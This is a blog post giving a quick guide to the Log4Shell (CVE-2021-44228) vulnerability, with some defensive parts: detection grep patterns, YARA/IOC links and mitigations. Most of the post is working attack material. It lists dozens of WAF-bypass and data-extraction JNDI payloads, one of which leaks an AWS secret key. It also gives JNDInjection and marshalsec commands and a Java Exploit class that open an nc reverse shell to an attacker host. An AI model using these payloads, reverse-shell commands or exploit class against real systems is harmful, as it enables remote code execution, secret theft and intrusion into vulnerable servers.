<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>log4hshell - Quick Guide - musana</title><meta description="&amp;lt;%- toc(page.content) %&amp;gt; 0x00 IntroductionCVE-2021-44228 (a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applica"><meta property="og:type" content="blog"><meta property="og:title" content="Cyber Security"><meta property="og:url" content="https://musana.net/"><meta property="og:site_name" content="musana.net"><meta property="og:description" content="&amp;lt;%- toc(page.content) %&amp;gt; 0x00 IntroductionCVE-2021-44228 (a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applica"><meta property="og:locale" content="en_US"><meta property="og:image" content="og:/img/logos.svg"><meta property="article:published_time" content="2021-12-13T05:55:22.000Z"><meta property="article:modified_time" content="2021-12-13T08:19:12.465Z"><meta property="article:author" content="Musa ŞANA"><meta property="article:tag" content="log4shell, log4j, log4shell-detection, log4shell-bypass, log4shell-exploit, log4shell-mitigation"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="og:/img/logos.svg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://musana.net/2021/12/13/log4shell-Quick-Guide/"},"headline":"musana","image":["https://musana.net/2021/12/13/log4shell-Quick-Guide/thumbnail.png"],"datePublished":"2021-12-13T05:55:22.000Z","dateModified":"2021-12-13T08:19:12.465Z","author":{"@type":"Person","name":"Musa ŞANA"},"description":"&lt;%- toc(page.content) %&gt; 0x00 IntroductionCVE-2021-44228 (a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applica"}</script><link rel="canonical" href="https://musana.net/2021/12/13/log4shell-Quick-Guide/"><link rel="icon" href="/img/logos.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/xt256.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script></head><body class="is-1-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logos.svg" alt="musana" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/musana"><i class="fab fa-github"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-12"><div class="card"><div class="card-image"><span class="image is-7by3"><img class="thumbnail" src="/2021/12/13/log4shell-Quick-Guide/thumbnail.png" alt="log4hshell - Quick Guide"></span></div><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><time class="level-item" dateTime="2021-12-13T05:55:22.000Z" title="2021-12-13T05:55:22.000Z">2021-12-13</time><span class="level-item"> Musa ŞANA </span><span class="level-item"><a class="link-muted" href="/categories/Application-Security/">Application Security</a></span></div></div><h1 class="title is-3 is-size-4-mobile">log4hshell - Quick Guide</h1><div class="content"><p>&lt;%- toc(page.content) %&gt;</p>
<h2 id="0x00-Introduction"><a href="#0x00-Introduction" class="headerlink" title="0x00 Introduction"></a>0x00 Introduction</h2><p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">CVE-2021-44228</a> (a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applications around the world. This vulnerability allows an attacker who can control log messages to execute arbitrary code loaded from attacker-controlled servers — and we anticipate that most apps using the Log4j library will meet this condition.</p>
<p>Apache Log4j2 &lt;=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. Affected versions are <code>2.0 &lt;= Apache log4j &lt;= 2.14.1</code></p>
<a id="more"></a>
<h2 id="0x01-How-to-works"><a href="#0x01-How-to-works" class="headerlink" title="0x01 How to works"></a>0x01 How to works</h2><p><img src="log4shell.png" alt="log4shell"></p>
<ol>
<li>An attacker inserts the JNDI lookup/payload in a anywhere of request that is likely to be logged. for instance: <code>${jndi:ldap://domain.com/j}</code>)</li>
<li>The payload is passed to log4j for logging.</li>
<li>Log4j interpolates the string and queries the malicious ldap server.</li>
<li>The ldap server responds with directory information that contains the malicious java class.</li>
<li>Java deserializes or download the malicious java class and execute it.</li>
</ol>
<h2 id="0x02-Simple-DNS-Log-Monitor-Services"><a href="#0x02-Simple-DNS-Log-Monitor-Services" class="headerlink" title="0x02 Simple DNS Log Monitor Services"></a>0x02 Simple DNS Log Monitor Services</h2><ul>
<li><a href="https://canarytokens.org/generate">canarytokens</a></li>
<li><a href="http://ceye.io/">ceye</a></li>
<li><a href="https://log.咕.com/">dnslog</a></li>
<li><a href="https://requestbin.net/">requestbin</a></li>
<li><a href="https://portswigger.net/burp/documentation/collaborator">burp collaborator</a></li>
<li><a href="https://www.joshmcguigan.com/blog/run-your-own-dns-servers/">run your own dns servers</a></li>
</ul>
<h2 id="0x04-Waf-Bypass-amp-Data-Extraction-Payloads"><a href="#0x04-Waf-Bypass-amp-Data-Extraction-Payloads" class="headerlink" title="0x04 Waf Bypass &amp; Data Extraction Payloads"></a>0x04 Waf Bypass &amp; Data Extraction Payloads</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;domain.com&#x2F;a&#125;</span><br><span class="line">$&#123;jndi:dns:&#x2F;domain.com&#125;</span><br><span class="line">$&#123;jndi:dns:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;$&#123;::-j&#125;$&#123;::-n&#125;$&#123;::-d&#125;$&#123;::-i&#125;:$&#123;::-r&#125;$&#123;::-m&#125;$&#123;::-i&#125;:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;$&#123;::-j&#125;ndi:rmi:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:rmi:&#x2F;&#x2F;domainldap.com&#x2F;j&#125;</span><br><span class="line">$&#123;$&#123;lower:jndi&#125;:$&#123;lower:rmi&#125;:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;$&#123;lower:$&#123;lower:jndi&#125;&#125;:$&#123;lower:rmi&#125;:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;$&#123;lower:j&#125;$&#123;lower:n&#125;$&#123;lower:d&#125;i:$&#123;lower:rmi&#125;:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;$&#123;lower:j&#125;$&#123;upper:n&#125;$&#123;lower:d&#125;$&#123;upper:i&#125;:$&#123;lower:r&#125;m$&#123;lower:i&#125;&#125;:&#x2F;&#x2F;domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:$&#123;lower:l&#125;$&#123;lower:d&#125;a$&#123;lower:p&#125;:&#x2F;&#x2F;domain.com&#125;</span><br><span class="line">$&#123;$&#123;env:NaN:-j&#125;ndi$&#123;env:NaN:-:&#125;$&#123;env:NaN:-l&#125;dap$&#123;env:NaN:-:&#125;&#x2F;&#x2F;domain.com&#x2F;a&#125;</span><br><span class="line">jn$&#123;env::-&#125;di:</span><br><span class="line">jn$&#123;date:&#125;di$&#123;date:&#39;:&#39;&#125;</span><br><span class="line">j$&#123;k8s:k5:-ND&#125;i$&#123;sd:k5:-:&#125;</span><br><span class="line">j$&#123;main:\k5:-Nd&#125;i$&#123;spring:k5:-:&#125;</span><br><span class="line">j$&#123;sys:k5:-nD&#125;$&#123;lower:i$&#123;web:k5:-:&#125;&#125;</span><br><span class="line">j$&#123;::-nD&#125;i$&#123;::-:&#125;</span><br><span class="line">j$&#123;EnV:K5:-nD&#125;i:</span><br><span class="line">j$&#123;loWer:Nd&#125;i$&#123;uPper::&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>The following payloads can be used for data extraction if you got ping back but it’s non exploitable.</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;env:user&#125;.domain.com&#x2F;exp&#125;</span><br><span class="line">$&#123;jndi:dns:&#x2F;&#x2F;$&#123;hostName&#125;.domain.com&#x2F;a&#125;</span><br><span class="line">$&#123;jndi:dns:&#x2F;&#x2F;$&#123;env:COMPUTERNAME&#125;.domain.com&#x2F;a&#125;</span><br><span class="line">$&#123;jndi:dns:&#x2F;&#x2F;$&#123;env:USERDOMAIN&#125;.domain.com&#x2F;a&#125;</span><br><span class="line">$&#123;jndi:dns:&#x2F;&#x2F;$&#123;env:AWS_SECRET_ACCESS_KEY.domain.com&#x2F;a&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;ctx:loginId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;map:type&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;filename&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;date:MM-dd-yyyy&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;docker:containerId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;docker:containerName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;docker:imageName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;env:USER&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;event:Marker&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;mdc:UserId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;java:runtime&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;java:vm&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;java:os&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;jndi:logging&#x2F;context-name&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;hostName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;docker:containerId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:accountName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:clusterName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:containerId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:containerName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:host&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:labels.app&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:labels.podTemplateHash&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:masterUrl&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:namespaceId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:namespaceName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:podId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:podIp&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:podName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:imageId&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;k8s:imageName&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;log4j:configLocation&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;log4j:configParentLocation&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;spring:spring.application.name&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:myString&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:0&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:1&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:2&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:3&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:4&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;main:bar&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;name&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;marker&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;marker:name&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;spring:profiles.active[0].domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;sys:logPath&#125;.domain.com&#x2F;j&#125;</span><br><span class="line">$&#123;jndi:ldap:&#x2F;&#x2F;$&#123;web:rootDir&#125;.domain.com&#x2F;j&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x03-Exploitation"><a href="#0x03-Exploitation" class="headerlink" title="0x03 Exploitation"></a>0x03 Exploitation</h2><ul>
<li><p>There are a lot diffirent way for exploitation. I will only share two.</p>
<ol>
<li><p>The following command starts rmiserver,ldap server. It generates jndi links. These links serves java class for performing commands that spesified at C parameter. A is your server-ip that you run ldap&amp;rmi.</p>
<ul>
<li><code>java -jar JNDInjection.jar -C &quot;nc 192.168.1.XX 1337 -e /bin/sh&quot; -A &quot;192.168.1.XX&quot;</code></li>
</ul>
</li>
<li><p>This way is a little dirty. The following command starts a ldap server and forwarding requests to spesified url. Because of this you should  start a web server and serve the malicious java class over the server. To do this quicly you can use python http.server module. note that the java class must be compatible/supports target’s jdk version.</p>
<ul>
<li><code>java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer &quot;http://192.168.1.XX:1337/#Exploit&quot;</code></li>
<li><code>python.exe -m http.server 1337</code></li>
</ul>
<ul>
<li>a simple example of java exploit to linux systems. (compile with javac)<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Exploit</span> </span>&#123;</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">Exploit</span><span class="params">()</span> </span>&#123;&#125;</span><br><span class="line"><span class="keyword">static</span> &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        Runtime.getRuntime().exec(<span class="string">"nc 192.168.1.105 1337 -e /bin/sh"</span>);</span><br><span class="line">        <span class="comment">/* other os </span></span><br><span class="line"><span class="comment">        String[] cmd = &#123;"cmd.exe",  "/c", "calc.exe"&#125;;</span></span><br><span class="line"><span class="comment">        String[] cmd = &#123;"open","/System/Applications/Calculator.app"&#125;;</span></span><br><span class="line"><span class="comment">        */</span></span><br><span class="line"></span><br><span class="line">    &#125;<span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">        e.printStackTrace();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line">    Exploit e = <span class="keyword">new</span> Exploit();</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<img src="poc.png" alt="log4shell"></li>
</ul>
</li>
</ol>
</li>
</ul>
<h2 id="0x05-Detection"><a href="#0x05-Detection" class="headerlink" title="0x05 Detection"></a>0x05 Detection</h2><ul>
<li><p>a bash command for quick detection log4shell attempts. It’s involves some waf bypass payloads too. It’s matched all payload that shared by sans in <a href="https://isc.sans.edu/api/webhoneypotreportsbyua/jndi">here.</a></p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name <span class="string">"*.log"</span> -<span class="built_in">exec</span> grep <span class="string">"\$&#123;jndi:ldap\|\$&#123;\$&#123;::-j&#125;\|\$&#123;jndi:rmi\|\$&#123;\$&#123;lower:jndi&#125;\|\$&#123;\$&#123;lower\:j&#125;\$&#123;lower:n&#125;\|\$&#123;\$&#123;lower:j&#125;\$&#123;upper:n&#125;\|\$&#123;\$&#123;lower:\$&#123;lower:jndi&#125;&#125;:"</span> &#123;&#125; -n -H --color \;</span><br></pre></td></tr></table></figure></li>
<li><p>a bash command for quick detection log4shell attempts in compressed files.</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo find / -name \*.gz -print0 | xargs -0 zgrep -E -i <span class="string">'\$(\&#123;|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+'</span></span><br></pre></td></tr></table></figure>
</li>
<li><p><a href="https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar">YARA Rule</a></p>
</li>
<li><p><a href="https://github.com/curated-intel/Log4Shell-IOCs">IOCs</a></p>
</li>
</ul>
<h2 id="0x06-Test-it-in-your-vm"><a href="#0x06-Test-it-in-your-vm" class="headerlink" title="0x06 Test it in your vm:"></a>0x06 Test it in your vm:</h2><p>Vulnerable App: <a href="https://github.com/christophetd/log4shell-vulnerable-app">log4shell-vuln-app</a></p>
<h2 id="0x07-burp-extansions"><a href="#0x07-burp-extansions" class="headerlink" title="0x07 burp-extansions"></a>0x07 burp-extansions</h2><ul>
<li><a href="https://github.com/tangxiaofeng7/BurpLog4j2Scan">burp-extansion</a></li>
<li><a href="https://github.com/whwlsfb/Log4j2Scan">burp-extansion-2</a></li>
<li><a href="https://github.com/pmiaowu/BurpShiroPassiveScan/">burp-extansion-passive</a></li>
</ul>
<h2 id="0x08-Mitigations"><a href="#0x08-Mitigations" class="headerlink" title="0x08 Mitigations"></a>0x08 Mitigations</h2><ul>
<li>upgrade to <a href="https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/"><strong>log4j-2.1.50.rc2</strong></a>. or</li>
</ul>
<ul>
<li>in previous releases (&gt;2.10) this behavior can be mitigated by setting system property <code>log4j2.formatMsgNoLookups=true</code> or it can be mitigated in prior releases (&lt;2.10) by removing the JndiLookup class from the classpath. (example: <code>zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code>)</li>
</ul>
<h2 id="0X09-References​"><a href="#0X09-References​" class="headerlink" title="0X09 References​"></a>0X09 References​</h2><p>big shout out to;<br><a href="https://www.lunasec.io/docs/blog/log4j-zero-day/"><strong>lunasec</strong></a>, <a href="https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j?s=09"><strong>fastly.com</strong></a>, <a href="https://www.cyberkendra.com/2021/12/log4shell-advisory-resource-cheat-sheet.html"><strong>cyberkendra.com</strong></a>, <a href="https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/"><strong>govcert.ch</strong></a>, <a href="https://github.com/tangxiaofeng7/"><strong>@tangxiaofeng7</strong></a>, <a href="https://github.com/christophetd/"><strong>@christophetd</strong></a>,<a href="https://twitter.com/shutingrz/"><strong>@shutingrz</strong></a>, <a href="https://gist.github.com/bugbountynights/"><strong>@bugbountynights</strong></a>, <a href="https://twitter.com/BountyOverflow/"><strong>@BountyOverflow</strong></a>, <a href="https://twitter.com/ymzkei5/status/1469765165348704256"><strong>@ymzkei5</strong></a>, <a href="https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"><strong>@Neo23x0</strong></a></p>
<h2 id="0x10-Why-this-thumbnail"><a href="#0x10-Why-this-thumbnail" class="headerlink" title="0x10 Why  this thumbnail?"></a>0x10 Why  this thumbnail?</h2><p><strong>Seraph:</strong> The Oracle has many enemies, I had to be sure.<br><strong>Neo:</strong> Of what?<br><strong>Seraph:</strong> That you were The One.<br><strong>Neo:</strong> You could’ve just asked.<br><strong>Seraph:</strong> You do not truly know someone until you fight them.</p>
</div><div class="article-tags size-small mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/log4shell-log4j-log4shell-detection-log4shell-bypass-log4shell-exploit-log4shell-mitigation/">log4shell, log4j, log4shell-detection, log4shell-bypass, log4shell-exploit, log4shell-mitigation</a></div><div class="sharethis-inline-share-buttons"></div><script src="https://platform-api.sharethis.com/js/sharethis.js#property=5f37aea1d0ad230012027a61&amp;product=sop" defer></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2017/01/14/HTTP-Basic-Authentication-Brute-Force/"><span class="level-item">HTTP Basic Authentication Brute-Force</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div id="disqus_thread"><noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript></div><script>var disqus_config = function () {
            this.page.url = 'https://musana.net/2021/12/13/log4shell-Quick-Guide/';
            this.page.identifier = '2021/12/13/log4shell-Quick-Guide/';
        };
        (function() {
            var d = document, s = d.createElement('script');  
            s.src = '//' + '0xmusana' + '.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();</script></div></div></div><!--!--><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logos.svg" alt="musana" height="28"></a><p class="size-small"><span>&copy; 2021 Musa ŞANA</span></p><p class="size-small">Powered by Hexo &amp; Icarus</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/musana"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'https://musana.net',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>